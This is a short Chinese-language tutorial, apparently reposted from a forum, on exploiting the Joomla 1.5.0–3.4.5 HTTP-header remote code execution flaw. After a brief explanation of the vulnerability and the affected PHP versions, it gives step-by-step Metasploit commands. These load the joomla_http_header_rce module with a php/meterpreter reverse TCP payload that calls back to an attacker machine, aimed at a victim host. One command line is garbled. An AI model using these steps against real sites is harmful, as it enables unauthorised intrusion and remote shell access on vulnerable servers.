Joomla CMS漏洞实战教程:如何利用Joomla CMS的远程代码执行漏洞

     Joomla遭受未经身份验证的远程代码执行,影响从1.5.0到3.4.5的所有版本。通过在数据库会话表中存储用户提供的头文件,可以通过发送UTF-8字符来截断输入。
    然后,一旦从数据库读取会话,就会执行自定义创建的有效负载。您还需要在5.4.45(包括5.3.x),5.5.29或5.6.13之前拥有PHP版本。在以后的版本中,无效会话数据的反序列化会在第一个错误时停止,并且漏洞利用将无效。
     PHP补丁包含在Ubuntu版本5.5.9 + dfsg-1ubuntu4.13和5.3.10-1ubuntu3.20以及Debian版本5.4.45-0 + deb7u1中。

利用目标
Joomla 1.5.0 - 3.4.5
需求
攻击者:kali Linux
受害者PC:Joomla 3.4.5
打开Kali终端类型  msfconsole
Joomla CMS漏洞实战教程
现在输入  exploit use / multi / http / joomla_http_header_rce
msf exploit (joomla_http­_header_rce)>set payload php/meterpreter/reverse_tcp
msf exploit (joomla_http­_header_rce)>set lhost 192.168.0.106 (IP address of kali Linux)
msf exploit (joomla_http­_header_rce)>set targeturi /joomla/
msf exploit (joomla_http­_header_rce)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (joomla_http­_header_rce)>set rport 80
msf exploit (joomla_http­_header_rce)>exploit    
Joomla CMS漏洞实战教程
转载请注明本文链接: http://www.mayidui.net/t2312.html
游客
登录后才可以回帖,登录 或者 注册